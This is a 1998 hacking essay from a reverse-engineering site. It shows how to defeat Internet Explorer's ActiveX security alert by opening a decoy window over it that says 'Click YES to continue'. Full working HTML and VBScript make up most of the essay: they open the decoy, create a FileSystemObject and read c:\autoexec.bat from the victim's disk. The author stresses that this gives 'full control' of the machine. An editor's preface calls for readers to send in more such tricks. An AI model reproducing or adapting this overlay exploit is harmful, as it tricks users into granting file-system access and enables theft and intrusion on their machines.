| |
Behind the window
How to bypass Micro$oft Internet Explorer security |
Not Assigned |
10 July 1998 |
by Cryptopoulos |
|
|
Courtesy of Fravia's page of reverse engineering |
slightly edited
by Fravia+ |
fra_00xx
980710
Cryptopoulos
0100
NA
PC
|
HTML cracking! How else should we describe this
nice essay by Cryptopoulos? Yes, it's easy stuff... once you have read it! Note also how some
other tricks on the same light of thought could be used to implement even more subtile games... ok,
I'm hopening an anti-MSIE contest right now: all readers that will send me the more innovative (and
clever) implementations of this kind of tricks will not only get their essay published, but
will also win one of the faboulous strategic gamez from the secret +HCU vault! Let's start a new
section: anti-MSIE wars, and now enjoy this essay by Cryptopoulos! |
|
| |
There is a crack, a crack in everything That's
how the light gets in |
|
Rating |
(x)Beginner
(x)Intermediate ( )Advanced ( )Expert |
|
Behind the window
How to bypass Micro$oft Internet Explorer security
Written by Cryptopoulos
When you click "YES" are you really responding to the true message box ?
This essay will show you how to bypass Micro$oft Internet Explorer security
using a very simple technique.
Text editor
Micro$sotf Explorer Navigators (4.0 , I have not tested 3.x)
When Micro$oft Internet Explorer detects that a Visual Basic Script included
in an HTML page will access your file system a security alert dialog is displayed :
An ActiveX object
on this page may be unsafe.
Do you want to allow it to initialize and be accessed by scripts ?
Nobody with a minimum knowledge about ActiveX and
VB Scripts would accept this dialog. If you click the "yes" button you have
given FULL CONTROL of your machine to the VB Script code.
T
his essay will show you how
to hide this dialog box and get FULL CONTROL over the victim machine.
The idea is very simple : just display a window
over the security alert hiding the message and replacing it by another friendly message
but keeping visible the buttons of the original message.
To do this you need to create two HTML pages the
first one with the code you want to execute in the victim machine and the second one with
the message overlapping the security alert.
Below is the HTML sample code to display the
"autoexec.bat" file in the HTML document :
<html>
<head>
<title>ActiveX Bug</title>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
</head>
<body>
<form method="POST" name="form1">
<p><textarea rows="24" name="S1"
cols="85"></textarea></p>
</form>
<p><script language="VBScript">
set wcover = window.open ("welcome.htm", "Welcome", "top =
190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no,
status=no")
Set fs = CreateObject("Scripting.FileSystemObject")
wcover.close
Set myfile = fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content
</script> </p>
</body>
</html>
The welcome.htm page with the nice
message is like this :
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<title>welcome</title>
</head>
<body bgcolor="#C0C0C0">
<div align="left">
<table border="0" width="306" height="62">
<tr>
<td width="300" height="56"><p
align="center"><strong>!!! You are Welcome !!!</strong></p>
<p align="center"><strong>Click YES to
continue</strong></td>
</tr>
</table>
</div>
</body>
</html>
Lets comment the code :
The instruction below will create the window
hiding the security alert :
set
wcover = window.open ("welcome.htm", "Welcome . . . )
Next instruction will generate the security alert because we are
accesing the file system this prompt will be behind the welcome window :
Set fs =
CreateObject("Scripting.FileSystemObject")
If the YES button is clicked we win .
Welcome window in no longer needed and we close it
wcover.close
At this point we are the owners of the machine as an example I will get
the autoexec.bat file and display it in a text box. But you can do anything you want.
Set myfile =
fs.OpenTextFile("c:\autoexec.bat")
content = myfile.readall
myfile.Close
document.form1.s1.value = content
Never accept ActiveX scripts !!!
Before respond a dialog box think about the window behind .
Ob duh doesn't apply man, we are just pointing out orrible bugs inside M$IE,
people should thank us!
You are deep inside Fravia's page of reverse engineering, choose your
way out:
homepage links
search_forms +ORC students' essays academy database
reality cracking how to search javascript
wars
tools anonymity academy cocktails
antismut CGI-scripts mail_Fravia
Is reverse engineering legal?